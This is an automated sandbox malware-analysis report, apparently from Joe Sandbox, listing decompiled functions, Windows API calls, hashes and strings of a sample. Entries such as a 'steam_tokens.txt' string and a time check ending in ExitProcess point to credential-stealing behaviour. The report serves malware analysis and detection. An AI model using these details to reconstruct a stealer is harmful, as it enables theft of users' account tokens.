                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 5f081d6b3c00c9ccd37c1619633f7336dea9cfe0cfd7bb17b8b2327d64b478bc
                            • Instruction ID: c0e999fd0120ab1f96f2e27dbbad02c0b34bd3a797d6f80f6ab52e6b5fcb7efb
                            • Opcode Fuzzy Hash: 5f081d6b3c00c9ccd37c1619633f7336dea9cfe0cfd7bb17b8b2327d64b478bc
                            • Instruction Fuzzy Hash: B4419971910229EBCB55EF64EC42BED77B8FF58301F004595FA1597291DF709E848B90
                            Function 0013EE90 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013EEBF
                            • lstrlen.KERNEL32(00000000), ref: 0013EED6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013EEFD
                            • lstrlen.KERNEL32(00000000), ref: 0013EF04
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0013EF32
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: 4add4671c1c1cff1fed54272576eeb48f391a6547ac0d3599db496fdeaa27a9c
                            • Instruction ID: 19bb25a53a06f0d7868602538615d0b4b61e31d11bf91eda2fed24c749412738
                            • Opcode Fuzzy Hash: 4add4671c1c1cff1fed54272576eeb48f391a6547ac0d3599db496fdeaa27a9c
                            • Instruction Fuzzy Hash: 16318F31A112356BCB22BB78FC4BA5E7BA8AF25305F041130F805DB666DB34DD5587C1
                            Function 00129A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0012140E), ref: 00129A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0012140E), ref: 00129AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,0012140E), ref: 00129AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,0012140E,00000000,?,?,?,0012140E), ref: 00129AE0
                            • LocalFree.KERNEL32(?,?,?,?,0012140E), ref: 00129B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,0012140E), ref: 00129B07
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 55bfb38233ea44b4e660b34a653e402b0b87b7f23e90731195eff4114bc1cb33
                            • Instruction ID: 3b81d848c7f81011b18b67588234c3a04ea5e8b52b3e2bf14ef69b422773c341
                            • Opcode Fuzzy Hash: 55bfb38233ea44b4e660b34a653e402b0b87b7f23e90731195eff4114bc1cb33
                            • Instruction Fuzzy Hash: 77112E71600329EFEB11DFA9EC88EAF776CEB08745F104259F911A7290EB719D50CBA0
                            Function 00145CE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00145D24
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A398
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A3BE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00145D8C
                            • memmove.MSVCRT(00000000,?,?), ref: 00145D99
                            • memmove.MSVCRT(00000000,?,?), ref: 00145DA8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: 2af21e84e8b211daf2c8d5a404113bb27c89ff53e54e2fbcf67c667b83540355
                            • Instruction ID: 85df276ef612da2501ef1a31753e00d103a050b56065b59686ddb1018fc5bc67
                            • Opcode Fuzzy Hash: 2af21e84e8b211daf2c8d5a404113bb27c89ff53e54e2fbcf67c667b83540355
                            • Instruction Fuzzy Hash: B6415275B005199FCF18DF6CC895AAEBBB5EF88310F158229E919E7395D7309D018B90
                            Function 001492ED Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: a14353f0172241cba201cd654051f0b7f19090a8abff79d2c6d7b1fb1ca8fff4
                            • Instruction ID: 078292d6964a484608e338068b5491c48118542662b5627f321209b67b3e8e30
                            • Opcode Fuzzy Hash: a14353f0172241cba201cd654051f0b7f19090a8abff79d2c6d7b1fb1ca8fff4
                            • Instruction Fuzzy Hash: 7641E5B05047589EDB318B24CD95BFB7BECAF45704F1844E8E98A87192E3719A468F60
                            Function 00137E80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00137E98
                              • Part of subcall function 0014A3D0: std::exception::exception.LIBCMT ref: 0014A3E5
                              • Part of subcall function 0014A3D0: std::exception::exception.LIBCMT ref: 0014A40B
                            • std::_Xinvalid_argument.LIBCPMT ref: 00137EB6
                            • std::_Xinvalid_argument.LIBCPMT ref: 00137ED1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: 2da07b1f323dd4edc1631c4bf9d855b124ab78f7b3be79277fe2b5c20463c231
                            • Instruction ID: e19a793794f7e7b01c92612a415c5d71a27d857fd9176bebc1b0f678438bbd5f
                            • Opcode Fuzzy Hash: 2da07b1f323dd4edc1631c4bf9d855b124ab78f7b3be79277fe2b5c20463c231
                            • Instruction Fuzzy Hash: 6821B9723042008FD734DE6CE890A2AB7E9BF91720F204A7DF4658B6D1D771DC458761
                            Function 00143590 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001435BF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 001435C6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 001435E1
                            • wsprintfA.USER32 ref: 00143607
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: ee1b8d495491c6681a38699244f3f124c8a7211923f199e099b8247f10c7e3b3
                            • Instruction ID: 257c589e3caf177689d172e84cc51e06504fb1bcd4194f396a701f958b90173d
                            • Opcode Fuzzy Hash: ee1b8d495491c6681a38699244f3f124c8a7211923f199e099b8247f10c7e3b3
                            • Instruction Fuzzy Hash: 6E01B571A44614EBD7049F98DD45B6EB7BCEB44711F000529F915E73A0D774990086A1
                            Function 001425D0 Relevance: 7.7, APIs: 6, Instructions: 234stringCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlenmemset
                            • String ID:
                            • API String ID: 3212139465-0
                            • Opcode ID: 21c2937e8915e8696e067c5daf27937b763aa47bfc30d6df287147c45c47a289
                            • Instruction ID: 60ce195ec3e206b896fd78dab1eb6463ca4cba6dc511082490a1738508e3a6bf
                            • Opcode Fuzzy Hash: 21c2937e8915e8696e067c5daf27937b763aa47bfc30d6df287147c45c47a289
                            • Instruction Fuzzy Hash: 1B81D3B1E0020A9BDB14CF94DC45BAEBBB5FF94301F54806DE908A73A1EB359D85CB94
                            Function 00138020 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00138071
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001380A0
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 001380E5
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 00138113
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 00138147
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: a84d2aec00c717c252dea5a44e1cdd3ebee80b597ce31d94fe5572a7bedd6b15
                            • Instruction ID: 938c83d9fe4a3cf2c34c3aaf2b9c00674c2c1d1c0524c14b5dad3ced88761370
                            • Opcode Fuzzy Hash: a84d2aec00c717c252dea5a44e1cdd3ebee80b597ce31d94fe5572a7bedd6b15
                            • Instruction Fuzzy Hash: B841A030600216DFDB25DF68D880E9EB7B8FF55301F114199F805DB250EB75EA6ACB91
                            Function 00138190 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 001381FB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013822A
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 00138242
                            • lstrlen.KERNEL32(00000000), ref: 00138280
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001382AF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 0bf8a47191dc11b690b71689590bd33b82ce49e82023e4510fe65fa4be115946
                            • Instruction ID: b70c7c89cef074d89e245fdcf6321ed169ada4004062dbbc9b5d206eec8e1c38
                            • Opcode Fuzzy Hash: 0bf8a47191dc11b690b71689590bd33b82ce49e82023e4510fe65fa4be115946
                            • Instruction Fuzzy Hash: B14188316006169FCB22DF68EA84BABBBF8EF44700F158159FC4ADB254EB34D941CB90
                            Function 00141CF0 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00141D42
                              • Part of subcall function 001419F0: lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00141A1F
                              • Part of subcall function 001419F0: lstrlen.KERNEL32(013E61B0), ref: 00141A30
                              • Part of subcall function 001419F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00141A57
                              • Part of subcall function 001419F0: lstrcat.KERNEL32(00000000,00000000), ref: 00141A62
                              • Part of subcall function 001419F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00141A91
                              • Part of subcall function 001419F0: lstrlen.KERNEL32(00154FA4), ref: 00141AA3
                              • Part of subcall function 001419F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00141AC4
                              • Part of subcall function 001419F0: lstrcat.KERNEL32(00000000,00154FA4), ref: 00141AD0
                              • Part of subcall function 001419F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00141AFF
                            • sscanf.NTDLL ref: 00141D6A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00141D86
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00141D96
                            • ExitProcess.KERNEL32 ref: 00141DB3
